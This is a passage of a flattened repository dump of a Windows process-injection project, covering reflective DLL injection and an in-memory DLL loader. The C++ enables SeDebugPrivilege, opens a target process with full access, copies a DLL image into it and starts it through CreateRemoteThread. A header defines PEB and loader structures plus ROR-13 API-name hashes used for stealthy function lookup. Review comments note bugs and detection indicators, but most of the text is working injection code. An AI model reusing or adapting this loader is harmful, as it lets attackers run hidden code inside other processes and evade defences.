            LPTHREAD_START_ROUTINE lpReflectiveLoader = (LPTHREAD_START_ROUTINE)((ULONG_PTR)lpRemoteLibraryBuffer + dwReflectiveLoaderOffset);


            // 1 MiB stack; creation flags 0 (run immediately).
            hThread = CreateRemoteThread(hProcess, NULL, 1024 * 1024, lpReflectiveLoader, lpParameter, (DWORD)NULL, &dwThreadId);

        } while (0);
    }
    __except(EXCEPTION_EXECUTE_HANDLER)
    {
        // Any SEH exception is reported as failure.
        hThread = NULL;
    }
    return hThread;
}
--------------------------------------------------------------------------------
/ReflectiveDLLInjection/LoadRemoteLibraryR.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
// Copies the DLL image in lpBuffer (dwLength bytes) into hProcess and starts a
// remote thread at its ReflectiveLoader export, passing lpParameter. Returns
// the thread handle or NULL. Defined in LoadRemoteLibraryR.cpp.
HANDLE WINAPI LoadRemoteLibraryR(HANDLE hProcess, LPVOID lpBuffer, DWORD dwLength, LPVOID lpParameter);
--------------------------------------------------------------------------------
/ReflectiveDLLInjection/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | CONSOLE APPLICATION : ReflectiveDLLInjection Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this ReflectiveDLLInjection application for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your ReflectiveDLLInjection application.
9 |
10 |
11 | ReflectiveDLLInjection.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | ReflectiveDLLInjection.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | ReflectiveDLLInjection.cpp
25 | This is the main application source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named ReflectiveDLLInjection.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/ReflectiveDLLInjection/ReflectiveDLLInjection.cpp:
--------------------------------------------------------------------------------
1 | // ReflectiveDLLInjection.cpp : Defines the entry point for the console application.
2 | //
3 |
4 | #include "stdafx.h"
5 | #include
6 | #include
7 | #include
8 | #include
9 | #include "LoadRemoteLibraryR.h"
10 | using namespace std;
11 |
12 | #define BreakForError(reason){cout << reason << endl; break;}
13 |
// Returns the PID of the first process in a Toolhelp32 snapshot whose image
// name compares equal to processName, or 0 on snapshot/enumeration failure or
// when nothing matches. Progress and failures are printed to stdout.
//
// NOTE(review): this project is built with the Unicode character set (see the
// .vcxproj) and the caller passes an L"" literal, so both processName and
// pe.szExeFile are wide strings; the comparison below nevertheless casts them
// to char* and uses strcmp, which stops at the first zero byte. For ASCII
// names that is the byte after the first character, so the compare is far
// looser than a full-name match.
// NOTE(review): hSnapShot is never closed on any path (handle leak), and the
// entry filled in by Process32First is never compared - the loop starts with
// Process32Next, so the first snapshot entry is skipped.
DWORD GetProcessIdByName(LPCTSTR processName)
{
    DWORD dwPID;   // declared but never used
    HANDLE hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hSnapShot == INVALID_HANDLE_VALUE)
    {
        cout << "Take SnapShot Failed!" << endl;
        return 0;
    }
    else
    {
        cout << "Take SnapShot Success!" << endl;
    }
    PROCESSENTRY32 pe;
    pe.dwSize = sizeof(PROCESSENTRY32);   // required by Process32First

    if (!Process32First(hSnapShot, &pe))
    {
        cout << "Failed To Get The Information of System!" << endl;
        return 0;
    }
    else
    {
        cout << "Get the Information of System Success!" << endl;
    }

    while (Process32Next(hSnapShot, &pe))
    {
        // Byte-wise compare of wide strings; see the review note above.
        if (!strcmp((const char *)processName, (const char *)pe.szExeFile))
            return pe.th32ProcessID;

    }
    return 0;
}
49 |
50 |
// Attempts to enable SeDebugPrivilege on the current process token.
// Returns FALSE if the token cannot be opened, the privilege LUID cannot be
// looked up, or AdjustTokenPrivileges fails; TRUE otherwise.
//
// NOTE(review): a nonzero return from AdjustTokenPrivileges does not mean the
// privilege was actually enabled - the API reports ERROR_NOT_ALL_ASSIGNED via
// GetLastError when the privilege is not held by the token, and that case is
// not checked here.
// NOTE(review): hToken is only closed on the success path; the two early
// returns after OpenProcessToken succeeds leak it.
// Monitoring note: a process enabling SeDebugPrivilege is a commonly audited
// token-privilege-adjustment event.
BOOL PrivilegeEscalation()
{

    HANDLE hToken;
    LUID luid;
    TOKEN_PRIVILEGES tp;
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
        return FALSE;
    if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid))
        return FALSE;
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    tp.Privileges[0].Luid = luid;

    if (!AdjustTokenPrivileges(hToken, 0, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL))
        return FALSE;
    CloseHandle(hToken);
    return TRUE;
}
70 |
// Entry point: reads a DLL image from a fixed absolute path into a heap
// buffer in this process, enables SeDebugPrivilege, opens another process and
// hands the buffer to LoadRemoteLibraryR (declared in LoadRemoteLibraryR.h).
// Every failure prints a message via BreakForError and leaves the do/while.
//
// NOTE(review): dwPid returned by GetProcessIdByName is printed but never
// used - OpenProcess below receives a literal PID. The searched name is
// "Task Manager.exe" while both log strings talk about notepad.
// NOTE(review): hFile, lpBuffer and hTargetProcess are never closed/freed on
// any path, and the handle returned by LoadRemoteLibraryR (hMoudle, sic) is
// never checked.
int main()
{
    do
    {

        LPCTSTR processName = L"Task Manager.exe";
        DWORD dwPid = GetProcessIdByName(processName);
        if (dwPid == 0)
            BreakForError("Failed to Get the notepad's PID.");
        cout << "The PID of Notepad.exe is :" << dwPid << endl;

        // Hard-coded, machine-specific path to the DLL image.
        LPCSTR injectionDll = "C:\\Users\\sudo\\Desktop\\ReflectiveDLLPEForm\\x64\\Debug\\ReflectiveDLL.dll";//"D:\\users\\sudo\\Documents\\GitHub\\ProcessInjection\\x64\\Debug\\ReflectiveDLL.dll";
        //Get the Handle of the DLL file.
        HANDLE hFile = CreateFileA(injectionDll, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
        if (hFile == INVALID_HANDLE_VALUE)
            BreakForError("Failed to open the DLL file.");

        //Get the DLL file size.
        DWORD dwLength = GetFileSize(hFile, NULL);
        if (dwLength == INVALID_FILE_SIZE || dwLength == 0)
            BreakForError("Failed to get the DLL file size.");

        // Allocate a buffer in the current process for the file contents.
        LPVOID lpBuffer = HeapAlloc(GetProcessHeap(), 0, dwLength);
        if (!lpBuffer)
            BreakForError("Failed to alloc a buffer.");
        //Read the DLL file.
        DWORD dwBytesRead = 0;
        // NOTE(review): dwBytesRead is not compared against dwLength, so a
        // short read is not detected.
        if (ReadFile(hFile, lpBuffer, dwLength, &dwBytesRead, NULL) == false)
            BreakForError("Failed to read the DLL file");
        if (!PrivilegeEscalation())
            BreakForError("Failed to Escalate Privilege.");

        //Open target process
        // NOTE(review): literal PID; dwPid from above is not used here.
        HANDLE hTargetProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE,1496);
        cout << GetLastError() << endl;   // printed unconditionally, even on success
        if (!hTargetProcess)
            BreakForError("Failed to Open the Target Process.");

        //Inject into target process
        HANDLE hMoudle = LoadRemoteLibraryR(hTargetProcess, lpBuffer, dwLength, NULL);

    } while (0);
    system("pause");
    return 0;
}
117 |
118 |
--------------------------------------------------------------------------------
/ReflectiveDLLInjection/ReflectiveDLLInjection.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 |
--------------------------------------------------------------------------------
/ReflectiveDLLInjection/ReflectiveDLLInjection.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {CEFFB8A5-3748-4AB5-AFAC-AA79F6BF5977}
23 | Win32Proj
24 | ReflectiveDLLInjection
25 | 8.1
26 |
27 |
28 |
29 | Application
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | Application
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | Application
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | Application
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 |
81 |
82 | false
83 |
84 |
85 |
86 | NotUsing
87 | Level3
88 | Disabled
89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
90 | true
91 |
92 |
93 | Console
94 | true
95 |
96 |
97 |
98 |
99 | NotUsing
100 | Level3
101 | Disabled
102 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
103 | true
104 |
105 |
106 | Console
107 | true
108 |
109 |
110 |
111 |
112 | Level3
113 | Use
114 | MaxSpeed
115 | true
116 | true
117 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
118 | true
119 |
120 |
121 | Console
122 | true
123 | true
124 | true
125 |
126 |
127 |
128 |
129 | Level3
130 | Use
131 | MaxSpeed
132 | true
133 | true
134 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
135 | true
136 |
137 |
138 | Console
139 | true
140 | true
141 | true
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 | Create
158 | Create
159 | Create
160 | Create
161 |
162 |
163 |
164 |
165 |
166 |
--------------------------------------------------------------------------------
/ReflectiveDLLInjection/ReflectiveDLLInjection.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 | Header Files
29 |
30 |
31 | Header Files
32 |
33 |
34 |
35 |
36 | Source Files
37 |
38 |
39 | Source Files
40 |
41 |
42 | Source Files
43 |
44 |
45 |
--------------------------------------------------------------------------------
/ReflectiveDLLInjection/ReflectiveDLLInjection.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/ReflectiveDLLInjection/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // ReflectiveDLLInjection.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/ReflectiveDLLInjection/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #include
11 | #include
12 |
13 |
14 |
15 | // TODO: reference additional headers your program requires here
16 |
--------------------------------------------------------------------------------
/ReflectiveDLLInjection/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/ReflectiveDLLInjection/x64/Debug/ReflectiveDLLInjection.Build.CppClean.log:
--------------------------------------------------------------------------------
1 | d:\users\sudo\documents\github\processinjection\reflectivedllinjection\x64\debug\reflectivedllinjection.pch
2 | d:\users\sudo\documents\github\processinjection\reflectivedllinjection\x64\debug\vc140.pdb
3 | d:\users\sudo\documents\github\processinjection\reflectivedllinjection\x64\debug\vc140.idb
4 | d:\users\sudo\documents\github\processinjection\reflectivedllinjection\x64\debug\stdafx.obj
5 | d:\users\sudo\documents\github\processinjection\reflectivedllinjection\x64\debug\loadremotelibraryr.obj
6 | d:\users\sudo\documents\github\processinjection\reflectivedllinjection\x64\debug\reflectivedllinjection.obj
7 | c:\users\sudo\desktop\reflectivedllpeform\x64\debug\reflectivedllinjection.ilk
8 | c:\users\sudo\desktop\reflectivedllpeform\x64\debug\reflectivedllinjection.exe
9 | c:\users\sudo\desktop\reflectivedllpeform\x64\debug\reflectivedllinjection.pdb
10 | d:\users\sudo\documents\github\processinjection\reflectivedllinjection\x64\debug\reflecti.ceffb8a5.tlog\cl.command.1.tlog
11 | d:\users\sudo\documents\github\processinjection\reflectivedllinjection\x64\debug\reflecti.ceffb8a5.tlog\cl.read.1.tlog
12 | d:\users\sudo\documents\github\processinjection\reflectivedllinjection\x64\debug\reflecti.ceffb8a5.tlog\cl.write.1.tlog
13 | d:\users\sudo\documents\github\processinjection\reflectivedllinjection\x64\debug\reflecti.ceffb8a5.tlog\link.command.1.tlog
14 | d:\users\sudo\documents\github\processinjection\reflectivedllinjection\x64\debug\reflecti.ceffb8a5.tlog\link.read.1.tlog
15 | d:\users\sudo\documents\github\processinjection\reflectivedllinjection\x64\debug\reflecti.ceffb8a5.tlog\link.write.1.tlog
16 |
--------------------------------------------------------------------------------
/ReflectiveDLLInjection/x64/Debug/ReflectiveDLLInjection.log:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/ReflectiveDLLInjection/x64/Release/ReflectiveDLLInjection.log:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/ReflectiveDLLPEForm/ReflectiveDLLPEForm.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {3AD41A2B-0A0F-41C3-AC4C-1A052BF902AB}
23 | Win32Proj
24 | ReflectiveDLLPEForm
25 | 8.1
26 |
27 |
28 |
29 | Application
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | Application
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | Application
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | Application
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 |
81 |
82 | false
83 |
84 |
85 |
86 |
87 |
88 | Level3
89 | Disabled
90 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
91 | true
92 |
93 |
94 | Console
95 | true
96 |
97 |
98 |
99 |
100 |
101 |
102 | Level3
103 | Disabled
104 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
105 | true
106 |
107 |
108 | Console
109 | true
110 |
111 |
112 |
113 |
114 | Level3
115 |
116 |
117 | MaxSpeed
118 | true
119 | true
120 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
121 | true
122 |
123 |
124 | Console
125 | true
126 | true
127 | true
128 |
129 |
130 |
131 |
132 | Level3
133 |
134 |
135 | MaxSpeed
136 | true
137 | true
138 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
139 | true
140 |
141 |
142 | Console
143 | true
144 | true
145 | true
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 |
--------------------------------------------------------------------------------
/ReflectiveDLLPEForm/ReflectiveDLLPEForm.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Header Files
20 |
21 |
22 |
23 |
24 | Source Files
25 |
26 |
27 | Source Files
28 |
29 |
30 |
--------------------------------------------------------------------------------
/ReflectiveDLLPEForm/ReflectiveDemo.cpp:
--------------------------------------------------------------------------------
1 | // ReflectiveDemo.cpp : Defines the entry point for the console application.
2 | //
3 |
4 | #include
5 | #include "ReflectiveLoader.h"
6 | using namespace std;
7 |
// Entry point of the in-process demo: reads a DLL image from a fixed path into
// a freshly VirtualAlloc'd region of this process (committed RWX) and calls
// ReflectiveLoader with that region's address. Failures print a message and
// leave the do/while.
//
// NOTE(review): a ReadFile failure only logs and falls through, so
// ReflectiveLoader can be called on an uninitialised buffer; dwBytesRead is
// also never compared with dwLength.
// NOTE(review): hFile is never closed, and `char *dllFile = "..."` binds a
// string literal to a non-const pointer (deprecated conversion).
// NOTE(review): system("parse") looks like a typo for "pause" - left as-is
// here because it is runtime behaviour, not a comment.
int main()
{
    do
    {
        // The already-built DLL; at the stage of implementing the LoadLibraryA
        // function it can be any DLL.
        char *dllFile = "F:\\ReflectiveDLLInjection\\x64\\Debug\\reflective_dll.dll";
        HANDLE hFile = CreateFileA(dllFile, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
        if (hFile == INVALID_HANDLE_VALUE)
        {
            cout << "File Path is Wrong!" << endl;
            break;
        }
        else
        {
            cout << "Get File Success." << endl;
        }
        DWORD dwLength = GetFileSize(hFile, NULL);
        if (dwLength == INVALID_FILE_SIZE || dwLength == 0)
        {
            cout << "Failed to get the Dll file size." << endl;
            break;
        }
        else
        {
            cout << "File size is :" << dwLength << endl;
        }
        // Readable+writable+executable region sized to the raw file; RWX
        // private memory of this kind is a common memory-scanner indicator.
        LPVOID hBaseAddress = VirtualAlloc(NULL, dwLength, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
        if (!hBaseAddress)
        {
            cout << "Failed to Alloc Memory." << endl;
            break;
        }
        else
        {
            cout << "BaseAddress is :" << hBaseAddress << endl;
        }
        DWORD dwBytesRead;
        if (ReadFile(hFile, hBaseAddress, dwLength, &dwBytesRead, NULL) == false)
            cout << "Failed to Read File!" << endl;   // falls through regardless
        ReflectiveLoader((ULONG_PTR)hBaseAddress);

    } while (0);
    system("parse");
    return 0;
}
53 |
54 |
--------------------------------------------------------------------------------
/ReflectiveDLLPEForm/ReflectiveLoader.h:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | typedef HMODULE(WINAPI * LOADLIBRARYA)(LPCSTR);
5 | typedef FARPROC(WINAPI * GETPROCADDRESS)(HMODULE, LPCSTR);
6 | typedef LPVOID(WINAPI * VIRTUALALLOC)(LPVOID, SIZE_T, DWORD, DWORD);
7 | typedef DWORD(NTAPI * NTFLUSHINSTRUCTIONCACHE)(HANDLE, PVOID, ULONG);
8 | typedef BOOL(WINAPI * DLLMAIN)(HINSTANCE, DWORD, LPVOID);
9 | #define KERNEL32DLL_HASH 0x6A4ABC5B
10 | #define NTDLLDLL_HASH 0x3CFA685D
11 |
12 | #define LOADLIBRARYA_HASH 0xEC0E4E8E
13 | #define GETPROCADDRESS_HASH 0x7C0DFCAA
14 | #define VIRTUALALLOC_HASH 0x91AFCA54
15 | #define NTFLUSHINSTRUCTIONCACHE_HASH 0x534C0AB8
16 |
17 |
18 | //ReflectiveDLLInjection.h
19 | #define DEREF( name )*(UINT_PTR *)(name)
20 | #define DEREF_64( name )*(DWORD64 *)(name)
21 | #define DEREF_32( name )*(DWORD *)(name)
22 | #define DEREF_16( name )*(WORD *)(name)
23 | #define DEREF_8( name )*(BYTE *)(name)
24 |
25 | #define HASH_KEY 13
26 | #pragma intrinsic( _rotr )
// Rotate-right helper for hash(): rotates d right by HASH_KEY (13) bits using
// the MSVC _rotr intrinsic (MSVC-specific, see the #pragma intrinsic above).
__forceinline DWORD ror(DWORD d)
{
    return _rotr(d, HASH_KEY);
}
31 |
// ROR-13 string hash: for each byte of the NUL-terminated string c, rotate the
// running value right by 13 and add the byte. Presumably compared against the
// *_HASH constants defined above; the consumer (ReflectiveLoader) is not on
// this page.
//
// NOTE(review): the do/while adds c[0] before testing it, so for an empty
// string it then evaluates `*++c` and reads one byte past the terminator.
// c is dereferenced without a NULL check.
// NOTE(review): `register` is deprecated since C++11 and removed in C++17.
// Detection note: this exact rotate-13-and-add scheme and the hash constants
// above are well-known static-signature material.
__forceinline DWORD hash(char * c)
{
    register DWORD h = 0;
    do
    {
        h = ror(h);
        h += *c;
    } while (*++c);

    return h;
}
43 |
// Hand-declared layout of an undocumented ntdll structure (singly linked free
// block: next pointer plus size). Only declared here; nothing on this page
// uses it. The "0x8 bytes" in the original comment only holds for 32-bit.
typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes
{
    struct _PEB_FREE_BLOCK * pNext;
    DWORD dwSize;
} PEB_FREE_BLOCK, *PPEB_FREE_BLOCK;
49 |
50 |
// Local equivalent of the native UNICODE_STRING (byte length, byte capacity,
// pointer to a not-necessarily-NUL-terminated wide buffer). Declared under a
// different tag so it does not clash with the SDK definition.
typedef struct _UNICODE_STR
{
    USHORT Length;
    USHORT MaximumLength;
    PWSTR pBuffer;
} UNICODE_STR, *PUNICODE_STR;
57 |
58 |
// Hand-declared layout of the loader data block reached from the PEB; the
// three LIST_ENTRY heads link the LDR_DATA_TABLE_ENTRY records of loaded
// modules. Field offsets are taken from the author's debugger dump and are
// not verifiable from this file; the "0x28 bytes" only holds for 32-bit.
typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes
{
    DWORD dwLength;
    DWORD dwInitialized;
    LPVOID lpSsHandle;
    LIST_ENTRY InLoadOrderModuleList;
    LIST_ENTRY InMemoryOrderModuleList;
    LIST_ENTRY InInitializationOrderModuleList;
    LPVOID lpEntryInProgress;
} PEB_LDR_DATA, *PPEB_LDR_DATA;
69 |
70 |
// Partial layout of the process-parameters block (matches the shape the SDK
// publishes in winternl.h: reserved padding, then image path and command
// line). Only ImagePathName and CommandLine are named.
typedef struct _RTL_USER_PROCESS_PARAMETERS {
    BYTE Reserved1[16];
    PVOID Reserved2[10];
    UNICODE_STR ImagePathName;
    UNICODE_STR CommandLine;
} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;
// Partial, hand-declared PEB layout. The full field list is kept below as
// comments for reference; only BeingDebugged, pLdr, ProcessParameters and
// SessionId are live, with Reserved* byte arrays standing in for the rest.
// NOTE(review): the Reserved sizes fix the offsets of pLdr/ProcessParameters
// for one particular bitness/OS layout; they are not verifiable from this
// file (see the "0x210 bytes" size, which is not the 64-bit size).
typedef struct __PEB // 65 elements, 0x210 bytes
{
    //BYTE bInheritedAddressSpace;
    //BYTE bReadImageFileExecOptions;
    //BYTE bBeingDebugged;
    //BYTE bSpareBool;
    //LPVOID lpMutant;
    //LPVOID lpImageBaseAddress;
    //PPEB_LDR_DATA pLdr;
    //LPVOID lpProcessParameters;
    //LPVOID lpSubSystemData;
    //LPVOID lpProcessHeap;
    //PRTL_CRITICAL_SECTION pFastPebLock;
    //LPVOID lpFastPebLockRoutine;
    //LPVOID lpFastPebUnlockRoutine;
    //DWORD dwEnvironmentUpdateCount;
    //LPVOID lpKernelCallbackTable;
    //DWORD dwSystemReserved;
    //DWORD dwAtlThunkSListPtr32;
    //PPEB_FREE_BLOCK pFreeList;
    //DWORD dwTlsExpansionCounter;
    //LPVOID lpTlsBitmap;
    //DWORD dwTlsBitmapBits[2];
    //LPVOID lpReadOnlySharedMemoryBase;
    //LPVOID lpReadOnlySharedMemoryHeap;
    //LPVOID lpReadOnlyStaticServerData;
    //LPVOID lpAnsiCodePageData;
    //LPVOID lpOemCodePageData;
    //LPVOID lpUnicodeCaseTableData;
    //DWORD dwNumberOfProcessors;
    //DWORD dwNtGlobalFlag;
    //LARGE_INTEGER liCriticalSectionTimeout;
    //DWORD dwHeapSegmentReserve;
    //DWORD dwHeapSegmentCommit;
    //DWORD dwHeapDeCommitTotalFreeThreshold;
    //DWORD dwHeapDeCommitFreeBlockThreshold;
    //DWORD dwNumberOfHeaps;
    //DWORD dwMaximumNumberOfHeaps;
    //LPVOID lpProcessHeaps;
    //LPVOID lpGdiSharedHandleTable;
    //LPVOID lpProcessStarterHelper;
    //DWORD dwGdiDCAttributeList;
    //LPVOID lpLoaderLock;
    //DWORD dwOSMajorVersion;
    //DWORD dwOSMinorVersion;
    //WORD wOSBuildNumber;
    //WORD wOSCSDVersion;
    //DWORD dwOSPlatformId;
    //DWORD dwImageSubsystem;
    //DWORD dwImageSubsystemMajorVersion;
    //DWORD dwImageSubsystemMinorVersion;
    //DWORD dwImageProcessAffinityMask;
    //DWORD dwGdiHandleBuffer[34];
    //LPVOID lpPostProcessInitRoutine;
    //LPVOID lpTlsExpansionBitmap;
    //DWORD dwTlsExpansionBitmapBits[32];
    //DWORD dwSessionId;
    //ULARGE_INTEGER liAppCompatFlags;
    //ULARGE_INTEGER liAppCompatFlagsUser;
    //LPVOID lppShimData;
    //LPVOID lpAppCompatInfo;
    //UNICODE_STR usCSDVersion;
    //LPVOID lpActivationContextData;
    //LPVOID lpProcessAssemblyStorageMap;
    //LPVOID lpSystemDefaultActivationContextData;
    //LPVOID lpSystemAssemblyStorageMap;
    //DWORD dwMinimumStackCommit;
    BYTE Reserved1[2];
    BYTE BeingDebugged;                          // the documented debugger flag
    BYTE Reserved2[21];
    PPEB_LDR_DATA pLdr;                          // -> PEB_LDR_DATA module lists
    PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
    BYTE Reserved3[520];
    //PPS_POST_PROCESS_INIT_ROUTINE PostProcessInitRoutine;
    BYTE Reserved4[136];
    ULONG SessionId;
} _PEB, *_PPEB;
154 |
155 | // WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY
156 | //__declspec( align(8) )
// Per-module loader record as the author reconstructed it from the WinDbg
// dump noted above. The leading InLoadOrderLinks field is deliberately
// omitted (see the comment), so a pointer to this struct is expected to be
// obtained from the InMemoryOrderModuleList link, not the list head's
// natural first entry. Field layout is not verifiable from this file.
typedef struct _LDR_DATA_TABLE_ENTRY
{
    //LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry.
    LIST_ENTRY InMemoryOrderModuleList;
    LIST_ENTRY InInitializationOrderModuleList;
    PVOID DllBase;        // module base address
    PVOID EntryPoint;
    ULONG SizeOfImage;
    UNICODE_STR FullDllName;
    UNICODE_STR BaseDllName;   // file name only, e.g. compared by hash elsewhere (presumably)
    ULONG Flags;
    SHORT LoadCount;
    SHORT TlsIndex;
    LIST_ENTRY HashTableEntry;
    ULONG TimeDateStamp;
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
173 |
174 |
175 |
// One entry of a PE base-relocation block: 12-bit page offset and 4-bit
// relocation type packed into a WORD, matching the PE file format layout.
typedef struct
{
    WORD offset : 12;
    WORD type : 4;
} IMAGE_RELOC, *PIMAGE_RELOC;
181 | #ifdef __cplusplus
182 | extern "C" {
183 | #endif
184 |
185 | ULONG_PTR WINAPI ReflectiveLoader(ULONG_PTR callAddress);
186 |
187 | #ifdef __cplusplus
188 | }
189 | #endif
190 |
--------------------------------------------------------------------------------
/ReflectiveDLLPEForm/x64/Debug/Reflecti.3AD41A2B.tlog/unsuccessfulbuild:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/ReflectiveDLLPEForm/x64/Debug/Reflecti.3AD41A2B.tlog/unsuccessfulbuild
--------------------------------------------------------------------------------
/ReflectiveDLLPEForm/x64/Debug/ReflectiveDLLPEForm.log:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/ReflectiveDLLPEForm/x64/Release/ReflectiveDLLPEForm.log:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/ShellcodeInjection/ShellcodeInjection.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {45525617-1157-4230-8B6C-C559702469DF}
23 | Win32Proj
24 | ShellcodeInjection
25 | 8.1
26 |
27 |
28 |
29 | Application
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | Application
36 | false
